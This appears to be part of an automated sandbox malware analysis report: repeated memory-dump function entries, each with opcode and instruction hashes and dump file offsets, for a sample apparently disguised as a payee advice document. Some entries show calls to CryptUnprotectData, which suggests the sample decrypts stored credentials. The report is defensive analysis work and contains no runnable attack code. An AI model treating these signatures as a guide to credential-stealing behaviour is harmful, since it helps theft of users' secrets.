                                                                                                                                          • Opcode Fuzzy Hash: 65a94bebb3a5dd69bc022cd33878575f727232e77f9403086c89c3f3cefec103
                                                                                                                                          • Instruction Fuzzy Hash: D7825C74E012299FDB64DF69CD94BDDBBB2BB89300F1081EAA44DA7261DB315E81CF41
                                                                                                                                          APIs
                                                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 3A778F5D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353490212.000000003A770000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A770000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a770000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 834300711-0
                                                                                                                                          • Opcode ID: 691a4a98fdb28d41082204823e2942949bba03312f437ad440b49d565e910872
                                                                                                                                          • Instruction ID: 39b791b6ada7a0c22239af23ef401a663ac925e9b3bf58f4a222527e6e45f9e2
                                                                                                                                          • Opcode Fuzzy Hash: 691a4a98fdb28d41082204823e2942949bba03312f437ad440b49d565e910872
                                                                                                                                          • Instruction Fuzzy Hash: CD2156B6800249DFCB10CF99D545BEEBFF5EF88320F14841AE519A7210C33AA594DFA1
                                                                                                                                          APIs
                                                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 3A778F5D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353490212.000000003A770000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A770000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a770000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 834300711-0
                                                                                                                                          • Opcode ID: 1adf749b9cedd857efeb9c2bcd1d962faf390e12528e3896262e991c8def2177
                                                                                                                                          • Instruction ID: 2c93ea2bc4c1a0d6f29bfd377420914e083e954dd3ddb4af1451e6d4f013b456
                                                                                                                                          • Opcode Fuzzy Hash: 1adf749b9cedd857efeb9c2bcd1d962faf390e12528e3896262e991c8def2177
                                                                                                                                          • Instruction Fuzzy Hash: 0E1159B28003499FDB10CF99C545BEEBFF5EF48320F148459E518A7210C375A594DFA5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8dbcfa333e781573af12781ebe7545b169b0e34a76f41e3b863916ebe3e662f8
                                                                                                                                          • Instruction ID: 948fde1f2277a97a11e5a730df667265492f221032a8bc4bf49c5967cca5dad2
                                                                                                                                          • Opcode Fuzzy Hash: 8dbcfa333e781573af12781ebe7545b169b0e34a76f41e3b863916ebe3e662f8
                                                                                                                                          • Instruction Fuzzy Hash: 76225C74E00218CFDB14DFA8C880B9DBBB2BF88304F5185AAD449AB395DB319D85CF91
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b8e1654cf16719ddfdfa590d87f58ac47db3e1d57245addf3da7f4a5c84abf15
                                                                                                                                          • Instruction ID: aa2b3918407890b7baba45c376dba4a16c7cf76cad7fb752126d9e93c4e2ef53
                                                                                                                                          • Opcode Fuzzy Hash: b8e1654cf16719ddfdfa590d87f58ac47db3e1d57245addf3da7f4a5c84abf15
                                                                                                                                          • Instruction Fuzzy Hash: D5E1AF74E01218CFDB64DFA9C984B9DBBB2BF89304F2080AAD409BB351DB355A85CF15
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353490212.000000003A770000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A770000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a770000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f5d0ded307782fc8840d3a17f609e9ea45efcf26a9d91145371883f5bc12b759
                                                                                                                                          • Instruction ID: b7f904bc01ca67d506dc0b2daacb06976de23509afd9c389b1cb4b7d02d8d6b6
                                                                                                                                          • Opcode Fuzzy Hash: f5d0ded307782fc8840d3a17f609e9ea45efcf26a9d91145371883f5bc12b759
                                                                                                                                          • Instruction Fuzzy Hash: 9BE1A274E11218CFEB54DFA5C984B9DBBB2BF89304F2081AAD409BB391DB355A85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 44f4661f86bc0d473ceaf67d47790c2ced2c0132487831026a71ad7e4c647f3b
                                                                                                                                          • Instruction ID: 7531b58edaab521a875ffc8a0e66564fec7606279c34d7c1b9e3337f83fe7c11
                                                                                                                                          • Opcode Fuzzy Hash: 44f4661f86bc0d473ceaf67d47790c2ced2c0132487831026a71ad7e4c647f3b
                                                                                                                                          • Instruction Fuzzy Hash: 1ED19074E013288FDB64DFA5C994B9DBBB2BF89300F2081A9D419AB354DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353627350.000000003A810000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A810000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a810000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 75bf42016a166d5f87ee48d47c24fbe3a729267beb5abaf649f4f52ec242e9ec
                                                                                                                                          • Instruction ID: 434ba0edd2ff61a2f9a1022ec4c4e44562cd74f5844227738077c394411da379
                                                                                                                                          • Opcode Fuzzy Hash: 75bf42016a166d5f87ee48d47c24fbe3a729267beb5abaf649f4f52ec242e9ec
                                                                                                                                          • Instruction Fuzzy Hash: 67D18E74E012288FDB54DFA5C994B9DBBB2BF89300F2081AAD409AB354DB359E85CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353490212.000000003A770000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A770000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a770000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ce473154f9c1193cb7e33106445ed4c2d5011a0c482ccd11d307357713ee4f92
                                                                                                                                          • Instruction ID: ec357bcb621c20b43b26700f6bd467e4191daa4fdaaf516b0545ce39eff378b2
                                                                                                                                          • Opcode Fuzzy Hash: ce473154f9c1193cb7e33106445ed4c2d5011a0c482ccd11d307357713ee4f92
                                                                                                                                          • Instruction Fuzzy Hash: 94D1A178E11218CFDB54DFA9C994B9DBBB2BF89300F2080A9D809AB355DB315D86CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353490212.000000003A770000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A770000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a770000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 06b87edb82169e712077ce1838809e7e502ece033e4f5a25d592faf83278f256
                                                                                                                                          • Instruction ID: 4b38df012983d5c1f9ee4c5df61b7265a028fc87a88bc543ca48324780be0da1
                                                                                                                                          • Opcode Fuzzy Hash: 06b87edb82169e712077ce1838809e7e502ece033e4f5a25d592faf83278f256
                                                                                                                                          • Instruction Fuzzy Hash: 8FD1A078E10218CFDB54DFA9C994B9DBBB2BF89300F2080A9D809AB355DB355D86CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b44e782a0dbb8b09e4a8fc3ab7a0c6f2b0f41996e46966c239f6e40a64a34f0d
                                                                                                                                          • Instruction ID: 2538ab923bef275f35e699479f328ef6190875b9d4b8e2ff6a0929b35baf691e
                                                                                                                                          • Opcode Fuzzy Hash: b44e782a0dbb8b09e4a8fc3ab7a0c6f2b0f41996e46966c239f6e40a64a34f0d
                                                                                                                                          • Instruction Fuzzy Hash: ABC1B178E11218CFDB54DFA5C944B9DBBB2BF88304F1080AAD809AB355DB355E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1036ecdceb61af0364349d4feddffed0483cd0f76fbf3c8c6bec6b7142bd92cd
                                                                                                                                          • Instruction ID: 35a691c1f6e337a0d24ef1d4cf19db1adef6236d3747b4c17cab7f7278178e9a
                                                                                                                                          • Opcode Fuzzy Hash: 1036ecdceb61af0364349d4feddffed0483cd0f76fbf3c8c6bec6b7142bd92cd
                                                                                                                                          • Instruction Fuzzy Hash: A2C1A274E11218CFDB54DFA5C954B9DBBB2BF89300F2080AAD409AB395DB35AE85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c6598e055113a980c1dd18e0a4521fdfead2000af8d550c2b9c3bb2ae8b43a1e
                                                                                                                                          • Instruction ID: 368286cd206caaf024760731f8ef82c0d60eb931d568fcd9dc8612e495150d2b
                                                                                                                                          • Opcode Fuzzy Hash: c6598e055113a980c1dd18e0a4521fdfead2000af8d550c2b9c3bb2ae8b43a1e
                                                                                                                                          • Instruction Fuzzy Hash: 3DC1C374E10218CFDB54DFA5C944B9DBBB2BF89300F2080AAD409AB395DB35AE85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353490212.000000003A770000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A770000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a770000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: da33f78a04eb556008ae27fb91984b6deb4a5f918ab886fa7b1c9416dcd831a9
                                                                                                                                          • Instruction ID: bf96a0e23c5b59fd2d16ca3ddb66a151199dd03ef3cf75e175718f0fe53d5906
                                                                                                                                          • Opcode Fuzzy Hash: da33f78a04eb556008ae27fb91984b6deb4a5f918ab886fa7b1c9416dcd831a9
                                                                                                                                          • Instruction Fuzzy Hash: 7EC1B374E11218CFDB54DFA5C994BADBBB2BF89300F2080AAD409AB355DB355E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353733702.000000003A990000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A990000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a990000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 46b4aed8cbd06b408baacbae015e6bf8c4ae814d64e206e3b0925c6b9f51ea88
                                                                                                                                          • Instruction ID: 00dbd5644a920990c6ff1170fbb1ee9ed47860a9030c87e5340d1875bacccc28
                                                                                                                                          • Opcode Fuzzy Hash: 46b4aed8cbd06b408baacbae015e6bf8c4ae814d64e206e3b0925c6b9f51ea88
                                                                                                                                          • Instruction Fuzzy Hash: 41917A76900619CFE710EFA0C9597EEBBB1FB56306F101429D102B72E1CB780A49CF95
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353733702.000000003A990000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A990000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a990000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: db6f452efc87c3b96f9a89a17e7dd119252f75c4c3354beb25bbbd30e2c95cdd
                                                                                                                                          • Instruction ID: d87fa3772f863201194da985d83f326857fde124306d88fee78dc124ef3fa695
                                                                                                                                          • Opcode Fuzzy Hash: db6f452efc87c3b96f9a89a17e7dd119252f75c4c3354beb25bbbd30e2c95cdd
                                                                                                                                          • Instruction Fuzzy Hash: 0C917A76900619CFE710EFA0C9597EEBBB1FB56306F101419D102B72E1CB780A45CF95
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e9f1e8157d342d05e5643f1554de14489fc940ab9689f91d50039a0aa613f1ad
                                                                                                                                          • Instruction ID: 43e6b742c9b58a90b8dc1e43fda0b1267644a78b2249751f02fc235ea014db75
                                                                                                                                          • Opcode Fuzzy Hash: e9f1e8157d342d05e5643f1554de14489fc940ab9689f91d50039a0aa613f1ad
                                                                                                                                          • Instruction Fuzzy Hash: E5A1E274D00208CFDB14DFA9C944B9DBBB1BF88314F20926AE409AB3A1DB759985CF55
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 05d5700a493aeefe545ba8a74d89bfd2d9884a43d6303b1e63e0c27a75b63e16
                                                                                                                                          • Instruction ID: 241be73e04e4441531b221412a58f7a2df1d7970af3f8d8021265d9958899ad7
                                                                                                                                          • Opcode Fuzzy Hash: 05d5700a493aeefe545ba8a74d89bfd2d9884a43d6303b1e63e0c27a75b63e16
                                                                                                                                          • Instruction Fuzzy Hash: 38A1A3B5E01218CFEB64CF6AC944B9EFBF2AB88300F14C1AAD409A7250DB355A85CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fd2662f02063ef6e07167e1ef89ac1890944e7bf39f7ce2a4f9b9cfc97d833bc
                                                                                                                                          • Instruction ID: d0c7e2044c262c0f2ffff482f22e27254a73c9351d6fe59698a98d971fa8b4f7
                                                                                                                                          • Opcode Fuzzy Hash: fd2662f02063ef6e07167e1ef89ac1890944e7bf39f7ce2a4f9b9cfc97d833bc
                                                                                                                                          • Instruction Fuzzy Hash: DDA1B3B4E01218CFEB64CF6AC944B9EFBF2AF88300F14C1AAD409A7250DB345A85CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 48853519d44711a6253f6aaf3340cc92432215a10fbd164ece6cd2d6d0ac4451
                                                                                                                                          • Instruction ID: 9db1adf85ba787896f7a575b9f6a31b98418c5c7d29109102507f3c91bed7b93
                                                                                                                                          • Opcode Fuzzy Hash: 48853519d44711a6253f6aaf3340cc92432215a10fbd164ece6cd2d6d0ac4451
                                                                                                                                          • Instruction Fuzzy Hash: 8591D374D00218CFEB10DFA8C944B9DBBB1FF49314F20929AE40ABB291DB759985CF55
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cdd58ae12bb0775a07ce6af5cde65a55044f62ca44ae14522a8ce7cb16836942
                                                                                                                                          • Instruction ID: f24af27018623794a708e746ab670d27e92cadab30952248174912a0904430db
                                                                                                                                          • Opcode Fuzzy Hash: cdd58ae12bb0775a07ce6af5cde65a55044f62ca44ae14522a8ce7cb16836942
                                                                                                                                          • Instruction Fuzzy Hash: B9819174E00219DFDB54DFE9C890A9DBBB2BF89300F608169D819BB354EB359986CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2c5b22e01e3ada41e16bab30214504208349d2ddd7fa73e464a6a3fba8cc9761
                                                                                                                                          • Instruction ID: db3513f1bc8d2621249625b8b2a9e1106bdcd44c3f64abfc5bbb816455a2e3bb
                                                                                                                                          • Opcode Fuzzy Hash: 2c5b22e01e3ada41e16bab30214504208349d2ddd7fa73e464a6a3fba8cc9761
                                                                                                                                          • Instruction Fuzzy Hash: D6819075E00218CBDB54DFA9C890B9DBBB2BF89304F20816AD819BB354DB359986CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353627350.000000003A810000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A810000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a810000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: aa12da90501a8a451dfdd6af4fc23cbb0358f3552c8e3d7ee29a25a10cb5b476
                                                                                                                                          • Instruction ID: 22fece4446cca42092a70877d7ce3ca21a21fd9f7bdaded12e27d18cee411952
                                                                                                                                          • Opcode Fuzzy Hash: aa12da90501a8a451dfdd6af4fc23cbb0358f3552c8e3d7ee29a25a10cb5b476
                                                                                                                                          • Instruction Fuzzy Hash: CA819074E01218CFDB54DFA9C990AADBBB2BF88300F20816AD419BB395DB355D86DF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353627350.000000003A810000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A810000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a810000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 65a3f068ff77cc69652a2c048a954af1ff16e19e29bb3ae42b976e1142117ffb
                                                                                                                                          • Instruction ID: 676456f8c9303eabff3525df2b182f023605f1ec7c6a4ed443d355072dd37bdd
                                                                                                                                          • Opcode Fuzzy Hash: 65a3f068ff77cc69652a2c048a954af1ff16e19e29bb3ae42b976e1142117ffb
                                                                                                                                          • Instruction Fuzzy Hash: CF81AF74E00218CFDB54DFA9C991A9DBBB2BF88304F20856AD409BB354DB355986CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ac5416ed99a3e233d8d0d786e6f4c8e939a60edcc27770133a5fed3875f041aa
                                                                                                                                          • Instruction ID: 00cc86bd9b73e756e23315cb357027796f0f02961ff620ad2ed06db2a62d8b7a
                                                                                                                                          • Opcode Fuzzy Hash: ac5416ed99a3e233d8d0d786e6f4c8e939a60edcc27770133a5fed3875f041aa
                                                                                                                                          • Instruction Fuzzy Hash: 4F81A5B4E016188FEB68CF66C944B9EFBF2BF88300F14C1AAD409A7254DB745A85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 956ebc761d1f72c8a4781347e5a99ff4183b6e8ec7a167689e97ef03df5f5f5b
                                                                                                                                          • Instruction ID: fbcc84686185ec8a3f2b19528423c3d7447b06586dfc4ede1ca84293e97ca523
                                                                                                                                          • Opcode Fuzzy Hash: 956ebc761d1f72c8a4781347e5a99ff4183b6e8ec7a167689e97ef03df5f5f5b
                                                                                                                                          • Instruction Fuzzy Hash: 9F519C74D042488BEB25CFA9D9A06DEBFF3BF89304F14806AC455AF255DB38990ACF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: db5797b55dbf74172db2d038cef22d5dde2c9c24f86e2aa7387637a9c631a49a
                                                                                                                                          • Instruction ID: 66c354b08ce5a1defdf930f4be01664275213b95723a819e92fd55548eb083bf
                                                                                                                                          • Opcode Fuzzy Hash: db5797b55dbf74172db2d038cef22d5dde2c9c24f86e2aa7387637a9c631a49a
                                                                                                                                          • Instruction Fuzzy Hash: 1451B574E10208DFDB18DFAAD894A9DBBF2BF89310F24C169E815AB365DB305952CF14
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c9a6cb0f550d09af7116f4154cbfaf586f7a2e84003e21c3e5a0321980dd24e4
                                                                                                                                          • Instruction ID: a70e52598da2cc4718aa815158ba1549f6dba8674f1734a273473531ec220dff
                                                                                                                                          • Opcode Fuzzy Hash: c9a6cb0f550d09af7116f4154cbfaf586f7a2e84003e21c3e5a0321980dd24e4
                                                                                                                                          • Instruction Fuzzy Hash: FB519574E10208DFDB18DFAAD884A9DBBF2BF89300F24C129E819AB365DB345951CF54
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6df24d26f1a543af84d58651c2d7bfde265390cccdee4c9356595e8bda798667
                                                                                                                                          • Instruction ID: cd74564ab0c362de82b5e3ba8de6c6ea5ec35b0944647d12111d5997ee452535
                                                                                                                                          • Opcode Fuzzy Hash: 6df24d26f1a543af84d58651c2d7bfde265390cccdee4c9356595e8bda798667
                                                                                                                                          • Instruction Fuzzy Hash: EB517B75D042488FDB24CFAAD9A06DDBBB3BF89304F14906AC454AB215DB39A94ACF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fdc45b05449d507e810ddc0c7a28760ffd97dfe205162ffeab8db9dd9bc679e6
                                                                                                                                          • Instruction ID: acd9515efad1a0afa3305ac11e63b97a2e3ab82c580eb34518a0b53db55b2fa2
                                                                                                                                          • Opcode Fuzzy Hash: fdc45b05449d507e810ddc0c7a28760ffd97dfe205162ffeab8db9dd9bc679e6
                                                                                                                                          • Instruction Fuzzy Hash: A1411B74D012588BEB24CFAAD9A469DBBB3BF89304F14D06AC419BB354DB35994ACF40
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
